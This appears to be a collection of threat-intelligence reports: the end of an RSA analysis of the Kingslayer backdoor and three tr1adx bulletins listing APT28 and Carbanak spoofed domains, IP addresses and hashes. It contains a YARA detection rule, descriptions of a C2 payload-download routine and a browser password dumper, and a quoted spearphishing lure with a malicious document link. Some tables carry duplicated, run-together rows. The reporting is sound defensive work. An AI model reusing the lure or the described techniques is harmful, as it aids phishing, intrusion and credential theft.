facilitate a rapid enterprise survey for Kingslayer artifacts. RSA Research s Yara signature will detect artifacts from the stolen code-signing key used to sign DLLs and EXEs in the Kingslayer backdoor. While this code-signing key was also used to sign some limited number of legitimate software versions, any hits with this signature warrants investigation. Systems and Windows networks found with any of the Indicators of Compromise (IOCs) in the Kingslayer IOC list, should be analyzed for compromise. Enterprise investigation should focus on identifying any ongoing C2 channels and activity, and an assessment of business risk/loss should a breach be indicated. CONCLUSION RSA Research observed sustained activity from an advanced threat actor group over 18+ months, tied to campaigns attributed to Codoso. There was an evolutionary deployment of tools characterized by very low (if any) coverage by antivirus vendors. In the course of our research and disruption of this malicious activity, RSA was able to uncover an advanced strategic targeting campaign involving a software supply chain attack aimed at sysadmins of large enterprises, dubbed Kingslayer. While the entire target set of Kingslayer is unknown, RSA Research expects the information contained in this report to be useful for network defenders in determining if they have been Kingslayer subjects of compromise. This may not be the last software supply chain attack from these or related actors. We believe Kingslayer, with its inherent enterprise breach efficacy and long interlude before discovery, could serve as a template for future strategic network compromises. We illustrated that it takes keen visibility and awareness, and the right tools, to discover advanced threat activity like Kingslayer. Finally, organizations need to have the ability to detect and respond to the next supply chain attack, before it has an impact on their business or mission. ACKNOWLEDGEMENTS RSA Research would like to thank Chuck Helstein, Darien Huss of ProofPoint, Luis Garcia of luisangelgarcia.com, MS-ISAC13 and CCIRC14. https://msisac.cisecurity.org https://www.publicsafety.gc.ca/cnt/ntnl-scrt/cbr-scrt/ccirc-ccric-eng.aspx ANNEX 1: KINGSLAYER INDICATORS OF COMPROMISE (IOCS) Download available on rsa.com 15 Yara Signature: rule Kingslayer_codekey meta: author = RSA Research date = 03 February 2017 hash2 = f97a2744a4964044c60ac241f92e05d7 hash3 = 76ab4a360b59fe99be1ba7b9488b5188 hash4 = 1b57396c834d2eb364d28eb0eb28d8e4 strings: $val0 = { 31 33 31 31 30 34 31 39 33 39 31 39 5A 17 0D 31 35 31 31 30 34 31 39 33 39 31 39 5A } $ven0 = { 41 6C 74 61 69 72 20 54 65 63 68 6E 6F 6C 6F 67 69 65 73 } uint16(0) == 0x5A4D and $val0 and $ven0 APPENDIX A: EVENT LOG ANALYZER APPLICATION SERVICE EXECUTABLE ANALYSIS Table 2 shows the basic properties of the Kingslayer backdoored service executable Table 2 Malware file properties Figure 8 shows the valid Authenticode digital signature of the service executable Figure 8 Valid Authenticode signature The Trojan functionality is initiated when the [Redacted]Service is started. The [Redacted]ServiceMailCheck class is instantiated as an object and the InitCheck() Method is called. Figure 9 shows the code responsible for the InitCheck(). Figure 9 InitCheck() method The [Redacted]ServiceMailCheck class sets a mailID string to a base64 encoded value. The InitCheck() Method then calls the public Method Run in a new thread (Figure 10). Figure 10 Encoded string The public Method Run checks the time and uses another encrypted string to set localization. This decryption routine, detailed later, decrypts the encrypted string to Tokyo Standard Time and will only run on Saturday, Tuesday, Thursday and Friday, in a nine-hour window prior to midnight. The malware is hard coded to sleep 20 minutes (2 different 10 minute windows) between beacons (Figure 11). Figure 11 Beacon timing and interval The malware will decrypt the previously set MailID variable Ex9TAVIbXghSXAAFSVBLRE8QWU8QVQ8fQQINT0FJSklLEkQeDFEfQA== ). Figure 12 depicts the decryption routine. Figure 12 Decryption routine The routine will initially base64 decode the MailID variable, and then hash the decoded data with the MD5 hashing algorithm. It will then set a seed byte based on the first byte of the decoded text. Each byte of the text is XOR decrypted against its respective byte in the MD5 sum, and then further XOR decrypted by the seed byte. The python script (Table 3) decodes encoded variables. Table 3 Python String decrypter to decode Kingslayer s encoded variables This script will output the decoded C2 URL. The encoded data from this sample will decode to http://www.oraclesoft[.]net/mailcheck.png (Figure 13). This URL matched the traffic that was observed in the beaconing from Iota to the RSA sink hole. Figure 13 Beacon matches decrypted URL The LoadImage() Method creates a new thread and calls the ProcessThread() Method, passing the URL and password (Figure 14). Figure 14 New thread for beacon The ProcessThread() Method connects to the URL and builds the HTTP request as observed in network traffic. This function then checks to see if the gzip HTTP response header is present and decompresses the payload. It then sends the byte string to an unpacking function which writes the file to disk. This activity is similar to that observed by a ProofPoint analyst in a post on Bergard and Codoso. The ProofPoint analyst observed the Bergard infection to receive instructions from its C2 to retrieve a PNG file (Fig. 15) containing an encoded PlugX payload (md5: 5c36e8d5beee7fbc0377db59071b9980)16. We do not know if the K2 Trojan decoded from the mailcheck.png image file discussed in the main body of this research paper was PlugX, or some other Trojan/RAT. https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks Figure 15 Unpacking method employed to load The malware then checks the downloaded and unpacked data to verify the first two bytes are decimal 77 90 (0x4D5A). The malware performs these checks to ensure the data is a valid executable binary (Figure 16). Figure 16 K2 Trojan magic check CloudClimb then calls the RunByML() method which checks if the file is a valid executable and runs it, then writes the status to the console (Figure 17). Because this software is running as a service, it is running in Windows Session 0; therefore the console is hidden from the user. Figure 17 Additional payload execution There exists an alternate path and URL to this DLL loading functionality. In [Redacted]Service.AnalyzeLogs.Execute() email sending functionality there is an unencrypted URL and password (Figure 18). Figure 18 Alternate URL in Kingslayer backdoor The registration date of the domain (Table 4) contained in this URL coincides with the timeframe of the known compromise of Alpha s source code and websites in late March, 2015. Table 4 2015 timekard.com registration details Beaconing to this domain has not been observed and RSA Research believes this code will only execute if the application is configured to send email reports on logs. In mid-2016 the domain registration for timekard[.]com expired and was registered by a legitimate entity having nothing to do with the malicious activity described in this investigation. APPENDIX B: SELECT FORENSIC FINDINGS FROM AN ENTERPRISE ADMIN S MACHINE INFECTED WITH KINGSLAYER AND THE K2 SECONDARY MALWARE The machine investigated was used by Iota s principal Windows system administrator, and had the backdoored event log analysis service installed on 22 April 2015 at 19:07:18 UTC (Table 5), which was in the known subversion window of Alpha s websites. Table 5 Event log analysis application service installation The SYSTEM hive contains the Application Compatibility Cache entries. These entries track executable files for compatibility purposes between Windows upgrades. Several suspicious entries (Table 6) were discovered during the host triage. It is important to note that the timestamps on these entries are the $SI MTIME of the file and are not reliable indicators. Table 6 Suspicious ShimCache entries ANALYSIS OF BP.EXE In this same directory an executable was discovered that will find, decrypt and display passwords saved in Chrome and Firefox (Table 7). This file had an $FN CTIME of 17 August 2015 12:26:20.292 and did not appear to be executed as it was not in the shimcache. The file was owned by the Windows security identifier (SID) S-1-5-32-544, the SYSTEM account. This matches with the owner of the running backdoored event log analysis service, which also runs as SYSTEM. Table 7 Password dumper The password dumper starts by gathering system information about the current logged-on user in order to discover the individual user paths such as C:\ Users\Usera\AppData. It then begins reading the SQLlite database files and decrypting saved passwords. Figure 19 SQLite database file path The sample has the SQLite libraries statically linked at compile time, which accounts for the large size. It then leverages these functions to query the SQLite database to retrieve the encrypted stored passwords. Figure 20 Selecting encrypted passwords Sub_401BA9 leads to a series of calls to get the logged on user, impersonate that user in order to open the Windows key store to retrieve the encryption keys and, finally, decrypts the user s stored passwords. Figure 21 Stored password decryption If the sample was successful, it will print the decrypted URL, Username and Password to the terminal. Figure 22 Terminal output of password dumper After the sample has finished with Chrome passwords it moves on in a similar fashion to stored Firefox passwords and prints them to the terminal. Figure 23 Firefox output [tr1adx]: Intel tr1adx.net/intel/TIB-00003.html tr1adx Intelligence Bulletin (TIB) 00003: Bear Spotting Vol. 1: Russian Nation State Targeting of Government and Military Interests [Published: January 9, 2017] [Last Updated: January 15, 2017] Summary The tr1adx team performs on-going research into Threat Actors, irrespective of their motivation, provenance, or targets. tr1adx Intelligence Bulletin #00003 shares intel on Russian Nation State Cyber Activity targeting Government and Military interests around the world. Please note this is an active bulletin, meaning we will occassionally add intel and information to this bulletin as we uncover new campaigns, targets or actors which meet the criteria. tr1adx's research was able to identify targets in various countries and/or regions, including: Turkey Japan Denmark United States Venezuela India NATO Affiliated Targets United Nations Analysis TTP's associated with Russian Nation State Threat Actors (Civil and Military Intelligence/GRU/APT28/APT29) allow us to track these Threat Actors' activities with a high/moderate degree of confidence, and follow their trail of breadcrumbs through past, present, and future campaigns. While, for operational security reasons, we cannot go into detail on our techniques, practices, and sources for intelligence collection and analysis, we can say that the majority of the information published in this bulletin is based on in-depth research leveraging available Open Source Intelligence (OSINT) sources. In a few cases, intel data has been enriched by, derived from, and collected through other non-OSINT means. Indicators of Compromise Added on 2017-01-15: Domain Creation Date Campaign Status Targeted Org Targeted Country Targeted Domain Analyst Notes (and other fun anecdotes) dpko[.]info 201610-29 Unknown United Nations (UN) Department of Peacekeeping Operations (DPKO) United States un.org UN DPKO website unausanyc[.]com 201512-02 Unknown United Nations Association of New York United States unanyc.org Identified phishing originating from this domain targeting the Venezuelan government (minpal.gob.ve) ausa[.]info 2015- Inactive Association of United ausa.org ESET identified ausa[.]info 201507-19 Inactive Association of the United States Army (AUSA) United States ausa.org ESET identified similar indicator (ausameetings[.]com) in their APT28/Sednit report. mea-gov[.]in 201502-20 Inactive Ministry of External Affairs (MEA) India mea.gov.in mfa-news[.]com 201504-30 Inactive Ministry of Foreign Affairs (MFA) Fake news site defenceinform[.]com 201505-05 Inactive MDefense Related Fake news site middleeastreview[.]com 201504-15 Inactive Middle East Review of International Affairs (MERIA) United States rubincenter.org middleeasterview[.]com 201504-15 Inactive Middle East Review of International Affairs (MERIA) United States rubincenter.org foreign-review[.]com 201504-14 Inactive Foreign Affairs Fake news site Added on 2017-01-09: Domain Creation Date Campaign Status Targeted Org Targeted Country Targeted Domain Analyst Notes (and other fun anecdotes) afceaint[.]org 201611-02 Inactive Armed Forces Communications and Electronics Association (AFCEA) United States afcea.org Identified 2 related indicators, one of which ties in to another campaign: ns1[.]afceaint[.]org (216.155.143.28) ns2[.]afceaint[.]org (216.155.143.27) af-army[.]us 201610-17 Active Army / Air Force United States army.mil / af.mil The af-army[.]us domain was seen resolving to 167.114.35.70, which is listed as one of the IP listed as one of the IP addresses in the GRIZZLY STEPPE report. webmailmil[.]dk (*) 201503-25 Inactive Defence Command Denmark webmail.mil.dk Domain was hosted on 216.155.143.27, also seen in AFCEA campaign. Seriously? We know it's been 2 years and the Denmark Defense campaign may not have been publicized but come on guys... #BadOpsec! natonevvs[.]org 201610-05 Unknown North Atlantic Treaty Organization (NATO) Affiliates jimin-jp[.]biz 201612-27 Active Liberal Democratic Party of Japan Japan jimin.jp Per our Japanese Gov't sources, domain has been observed in targeted malware. jica-gojp[.]biz 201612-27 Active Japan International Cooperation Agency Japan jica.go.jp Per our Japanese Gov't sources, domain has been observed in targeted malware. mofa-gojp[.]com 201612-27 Active Ministry of Foreign Affairs Japan mofa.go.jp Per our Japanese Gov't sources, domain has been observed in targeted malware. turkeymia[.]com 201612-20 Active Ministry of Interior Ankara (MIA) Turkey mia.gov.tr Spoofed domain points to legitimate MIA domain: icisleri.gov.tr turkeyicisleri[.]com 201612-20 Active Ministry of Interior Ankara (MIA) Turkey icisleri.gov.tr Spoofed domain points to legitimate MIA domain: icisleri.gov.tr (*) Legitimate organization appears to have claimed control over the spoofed/mimicked domain. Indicators of Compromise (IOCs) [Downloadable Files]: TIB-00003 Domain IOCs [TXT] If a log search for any of these Indicators of Compromise returns positive hits, we recommend you initiate appropriate cyber investigative processes immediately and engage Law Enforcement where appropriate. [tr1adx]: Intel tr1adx.net/intel/TIB-00002.html tr1adx Intelligence Bulletin (TIB) 00002: The "Digital Plagiarist" Campaign: TelePorting the Carbanak Crew to a New Dimension [January 1, 2017] Summary Over the past few months, the tr1adx team has been tracking a Threat Actor which we codenamed "TelePort Crew". We believe the "TelePort Crew" Threat Actor is operating out of Russia or Eastern Europe with the group's major motivations appearing to be financial in nature through cybercrime and/or corporate espionage. We have dubbed the group's latest campaign "Digital Plagiarist" for its signature practice of mirroring legitimate sites (using Tenmax's TelePort Pro and TelePort Ultra site mirroring software) onto similarly named domains, on which the TelePort Crew would host and serve up malware laden Office documents. The Threat Actor would then craft specific spear phishing emails to direct their targets to visit the malicious web sites and open the malware laden documents. Corerrelation of the TelePort Crew's TTPs and infrastructure leads us to believe the group is closely affiliated with, and may in fact be, the Carbanak Threat Actor. At this time, we are able to disclose that we have seen activity associated with the "Digital Plagiarist" campaign in the following countries: Australia United Kingdom United States Ireland Switzerland Bahamas Focused Industries for the "Digital Plagiarist" campaign include: Hospitality Restaurant Chains Food Production Nutritional Supplements Agriculture / BioTechnology Marketing / Public Relations Manufacturing Logistics Software Development (including Point-of-Sale solutions) Utilities & Electric Government Analysis Activity attributed to the "Digital Plagiarist" campaign first came on tr1adx's radar in the fall of 2016, when the TelePort Crew threat actor was seen registering a number of domain names which raised flags due to the suspicious nature of the domain names, attributes associated with the domain registration, and content served on these domains. Further research indicates that the "Digital Plagiarist" campaign has been active since at least July 2016, and possibly earlier, with very rapid turn around times between the provisioning of attack/C2 infrastructure and execution of the actual attacks. Based on our observations, we believe the TelePort Crew threat actor has performed considerable research on their targets, including mapping out business/customer relationships between the targets as well as understanding other geographic and target "trust" specific attributes often seen in cases of watering hole attacks. Overview of Attack Methodology and TTP's Domain Registration The TelePort Crew would start off by registering domain names, which closely resemble those of legitimate web sites. These web sites would be designed to either mimic the group's intended target, or a third party trusted by the intended target. The majority of these domain registrations appear to use a single registrar, "PDR Ltd. d/b/a PublicDomainRegistry.com", and in some cases the Threat Actor would recycle the same Registrant Information. We also noted a number of specific differentiators when it comes to comparing the Registrant Information and the types of malicious websites that were used. The following table summarizes some of the more interesting domains we have seen the TelePort Crew threat actor register as part of the "Digital Plagiarist" campaign. While some of these domains are used for malware delivery, others are used for email domain spoofing, and C2 communications. A full list of (disclosable) domains suspected to be associated with the TelePort Crew's "Digital Plagiarist" campaign is provided in the Indicators of Compromise section: Domain Creation Date Registrant Registrar Org Mimicked Country Domain Mimicked Industry microfocus-official[.]com 201610-28 Andrey Arseniev PDR Ltd. d/b/a Micro Focus International United Kingdom microfocus.com Software Development perrigointernational[.]com 2016- Andrey PDR Ltd. Perrigo United perrigo.com Healthcare perrigointernational[.]com 201610-28 Andrey Arseniev PDR Ltd. d/b/a Perrigo Company plc United States perrigo.com Healthcare ornuafood[.]com 201610-28 Andrey Arseniev PDR Ltd. d/b/a Ornua Food Ireland ornua.com Food Production esb-energy-int[.]com 201610-27 Dresde Nore PDR Ltd. d/b/a Electricity Supply Board Ireland esb.ie Utilities & Electric fda-gov[.]com 201612-09 Smolin Sergei PDR Ltd. d/b/a US Food and Drug Administration (FDA) United States fda.gov Government treasurygovernment[.]com 201612-09 Smolin Sergei PDR Ltd. d/b/a Department of the Treasury United States treasury.gov Government bentley-systems-ltd[.]com 201610-27 Dresde Nore PDR Ltd. d/b/a Bentley Systems United States bentley.com Software Development zynga-ltd[.]com 201610-27 Dresde Nore PDR Ltd. d/b/a Zynga United States zynga.com Software Development syngenta-usa[.]com (*) 201610-27 Dresde Nore PDR Ltd. d/b/a Syngenta Switzerland syngenta-us.com Agriculture/BioTech ai0ha[.]com 201611-29 Garry Torp PDR Ltd. d/b/a Aloha, Inc. United States aloha.com Nutritional Supplements iris-woridwide[.]com 201611-29 Garry Torp PDR Ltd. d/b/a iris Worldwide United Kingdom iris-worldwide.com Marketing/Public Relations strideindustrialusa[.]com 201512-21 Andrew Zavok PDR Ltd. d/b/a Stride Industrial Group Ltd United Kingdom strideindustrialgroup.com Manufacturing waldorfs-astoria[.]com 201612-11 Fred Hesl PDR Ltd. d/b/a WaldorfAstoria United States waldorf-astoria.com Hospitality atlantis-bahamas[.]com 201612-11 Fred Hesl PDR Ltd. d/b/a Atlantis Bahamas Bahamas atlantisbahamas.com Hospitality sizzier[.]com 201612-01 Egor Danilkin PDR Ltd. d/b/a Sizzler Family Restaurants United States sizzler.com Restaurant Chain taskretaiitechnology[.]com 201612-01 Egor Danilkin PDR Ltd. d/b/a Task Retail Technology Australia taskretailtechnology.com Software Development dhl-service-au[.]com 201609-27 Remin Vladmiri PDR Ltd. d/b/a DHL Australia Australia dhl.com.au Logistics prsnewwire[.]com 201608-30 Remin Vladmiri PDR Ltd. d/b/a PR Newswire United States prnewswire.com Marketing/Public Relations (*) Legitimate organization reclaimed the mimicked/spoofed domain. Once the malicious domain had been registered, the group would point it to one of the following IP addresses: Domain Mirroring The Threat Actor would then use the TelePort Pro or TelePort Ultra software to mirror the content of the legitimate organization's web site to the newly registered domain. While in the majority of cases the TelePort Pro software would "flawlessly" mirror the web sites, if the web page contains links to external pages which are outside the scope of the TelePort site mirroring configuration, the software will rewrite some of the links in the mirrored HTML files as follows: Traces of TelePort Ultra seen on irisworidwide[.]com domain:
  • Twitter
  • Traces of TelePort Pro seen on prsnewwire[.]com domain: Malware Delivery Malware Delivery We were able to identify and confirm at least two separate instances where above domains were used to serve up malicious Office documents: The malware document "order.docx" is a stage 1 binary which, when opened by the end user, will download a stage 2 binary through the embedded macros in the malicious Office document. TrustWave recently did a great write up entitled "New Carbanak / Anunak Attack Methodology ", which provides additional details regarding the malware used in that campaign, as well as an overview of C2 communications and actor TTPs. Based on correlation of TTP's and infrastructure, we are fairly confident that the TelePort Crew is closely affiliated with, or is in fact the Carbanak Threat Actor. We also believe the "Digital Plagiarist" campaign is associated with, or an evolution of, the campaign described in the recent TrustWave report. Once the domains were properly mirrored and outfitted with malware, the TelePort Crew would craft spearphishing emails to their targets in order to lure them to download and open malicious Office documents hosted on one of the above domains. We have been able to observe at least one reported instance of such a spearphishing email related to the "Digital Plagiarist" campaign. barry_frith@shoneys.com -> "mailto:sizzier_company@yahoo.com" From: barry_frith@shoneys.com Sent: Wednesday, December 14, 2016 10:33 AM To: R_bgt, Briargate 0186 Subject: catering Hello, My name is George Thon and I'm an Project Manager with Sizzier Ltd. We have composed a list of services we require and interested in. Enclosed link contains all catering informatiom - http://www.sizzier.com/docs/order.docx Click on edit anyway at the top of the page and than double click to unlock content Sincerely, George Thon Sizzier Ltd. Campaign and Infrastructure Clean Up At the time of this writing, at least one of the malicious documents is still being served on one of the above listed domains. While all of the above listed domains are still active, only a few are still serving up mirrored content. When we started investigating this threat actor a few months ago, we were able to observe that almost all of the above listed domains were, at one time, serving up mirrored page content. Based on all elements of our research, we believe the TelePort Crew threat actor will remove malicious and non-malicious content once successful execution of the malware on the target has been achieved. At the same time, our analysis leads us to suggest that the TelePort Crew may also delete or rename malicious content when the Threat Actor believes their operation has been compromised. Targeted Industry / Organizations Interrelations As we started investigating the Teleport Crew threat actor and the "Digital Plagiarist" campaign, it became apparent fairly quickly that the group has spent a considerable effort in understanding and mapping out affinities and business/customer relationships between their targets and the domains they would register. A good example of that is the relationship between Sizzler Family Restaurants (TelePort Crew registered "sizzier[.]com") and Task Retail Technology (TelePort Crew registered "taskretaiitechnology[.]com"): Sizzler Family Restaurants is a restaurant chain operating in the United States and abroad (including Australia). Task Retail Technology is a software development company based in Australia, who develop the xchangexec Enterprise Point-of-Sale (POS) software. The Task Retail Technology web site lists Sizzler as one of their customers. Another, yet less obvious example, is that of the "relationship" between Perrigo (TelePort Crew registered "perrigointernational[.]com") and Syngenta (TelePort Crew registered "syngenta-usa[.]com"): Perrigo is a US based Pharmaceutical Company. Syngenta is a Swiss Agribusiness/BioTech firm, with offices in the United States. Based on multiple news reports [1] [2] [3] [4], both firms have seen similar investor profiles and were also both linked to Merger & Acquisition activity over the past year. In a potentially more sinister, and entirely speculative twist, there may be a relationship between TrustWave and iris Worldwide Marketing (TelePort Crew registered "iris-woridwide[.]com"): iris Worldwide is marketing company responsible for marketing of some of the world's biggest brands. TrustWave is a security company who recently published an article regarding the Carbanak / Anunak Threat Actor and their new Attack Methodology. Apparently, iris Worlwide was responsible for a marketing campaign around TrustWave's Global Security Report. Attribution The tr1adx team initially started tracking this Threat Actor under the codename "TelePort Crew" as a result of some of their TTP's. As we were delving deeper into the group's activities, we were seeing increasing overlap with TTP's and infrastructure associated with the Carbanak / Anunak threat actor, which was confirmed as we compared notes with the information in the TrustWave article, entitled "New Carbanak / Anunak Attack Methodology ", published in November 2016. Several elements strongly suggest TelePort Crew and Carbanak/Anunak may be one and the same threat actor: tr1adx's investigation, as well as the TrustWave investigation, point to a single IP address where the registered domains were hosted (192.99.14.211) tr1adx's investigation revealed that two domains we had been tracking (dhl-service-au[.]com and prsnewwire[.]com) were registered by a Registrant Name purporting to be "Remin Vladmiri". The same individual also registered "park-travels[.]com", which has been associated with the Carbanak/Anunak threat actor. The malware used in the "Digital Plagiarist" campaign appears to closely resemble that attributed to the Carbanak/Anunak threat actor, in terms of malware delivery, malware URL path, and behavior. Disclaimer The tr1adx team believes it is important to note that while we have seen this threat actor register domains similar in nature to domains belonging to legitimate organizations, we are in no way suggesting that these legitimate organizations or its customers were a direct target for the TelePort Crew threat actor. We do believe the group has leveraged the reputation and legitimacy of these organizations to give more credit to the "Digital Plagiarist" campaign, in turn potentially yielding a higher rate of success for compromising the group's victims. Indicators of Compromise Indicators of Compromise (IOCs): Domains (25+) - Summary Table microfocus-official[.]com iris-woridwide[.]com google3-ssl[.]com perrigointernational[.]com strideindustrialusa[.]com google4-ssl[.]com ornuafood[.]com waldorfs-astoria[.]com ssl-googles4[.]com esb-energy-int[.]com atlantis-bahamas[.]com google2-ssl[.]com fda-gov[.]com sizzier[.]com google5-ssl[.]com treasury-government[.]com taskretaiitechnology[.]com ssl-googlesr5[.]com bentley-systems-ltd[.]com dhl-service-au[.]com bols-googls[.]com zynga-ltd[.]com prsnewwire[.]com syngenta-usa[.]com google-ssls[.]com ai0ha[.]com google-stel[.]com Indicators of Compromise (IOCs): IP Addresses - Summary Table 192.99.14.211 31.41.41.41 144.76.61.231 Indicators of Compromise (IOCs): File Hashes - Summary Table order.docx MD5: 950afc52444e3b23a4923ab07c1e7d87 SHA1: 1827a7daa98c127af11318eebe23ec367f9146c9 order.docx MD5: ae8404ad422e92b1be7561c418c35fb7 SHA1: 400f02249ba29a19ad261373e6ff3488646e95fb Indicators of Compromise (IOCs) [Downloadable Files]: If a log search for any of these Indicators of Compromise returns positive hits, we recommend you initiate appropriate cyber investigative processes immediately and engage Law Enforcement where appropriate. [tr1adx]: Intel tr1adx.net/intel/TIB-00004.html tr1adx Intelligence Bulletin (TIB) 00004: A Pretty Dope Story About Bears: Early Indicators of Continued World Anti-Doping Agency (WADA) Targeting [Published: January 14, 2017] Summary The tr1adx team identified what we believe to be a new campaign, which we assess to be attributed to the Russian Nation State Threat Actor APT28 (a.k.a. Fancy Bear), yet again targeting the World Anti-Doping Agency (WADA) . In September 2016, WADA confirmed they were the victim of a successful breach, which occurred over the summer of 2016, and purportedly attributed to APT28, as was reported in WADA's press release on the attack. For those interested, ThreatConnect published an informative write up on this breach, entitled "Russian Cyber Operations On Steroids", detailing the APT28 campaign targeting WADA. Analysis On January 14, 2017, the tr1adx team observed what we believe to be early stages of a new campaign targeting the World AntiDoping Agency (WADA) or affiliates. A Threat Actor, following similar TTP's to those we have seen Russian Nation State Threat Actor APT28 use, has registered two domains which we assess may be used in further cyber attacks against the WADA or its affiliates. Additionally, in a move similar to TTP's described in ThreatConnect's "Russian Cyber Operations On Steroids" report, we believe the Threat Actor may be preparing to launch, or has already launched a phishing campaign against their targets. Indicators of Compromise Added on 2017-01-14: Domain Creation Date Campaign Status Targeted Targeted Country Targeted Domain Analyst Notes (and other fun anecdotes) worlddopingagency[.]com 201701-14 Active World AntiDoping Agency (WADA) Canada wadaama.org Identified 1 related indicator: 201701-14 Active World AntiDoping Agency (WADA) Canada wadaama.org Identified 1 related indicator: dopingagency[.]com mail[.]worlddopingagency[.]com (40.112.145.124) mail[.]dopingagency[.]com (40.112.145.124) Indicators of Compromise (IOCs) [Downloadable Files]: TIB-00004 Domain IOCs [TXT] If a log search for any of these Indicators of Compromise returns positive hits, we recommend you initiate appropriate cyber investigative processes immediately and engage Law Enforcement where appropriate. Recommendations Evidence suggests this campaign may be in the early execution phase. As such, a number of preventative and detective controls can be instrumented to deter this Threat Actor from achieiving their mission: Block traffic to and from any of the above listed domains and IP addresses on proxies and firewalls. Block emails originating from or going to aforementioned domains (worlddopingagency[.]com and dopingagency[.]com). Search through SIEM/Log Analysis tools for traces of connections to and from these domains or IP addresses, as well as proactively create alerting rules in SIEM or IDS/IPS. Recommendation for WADA: Get these domains taken down ASAP.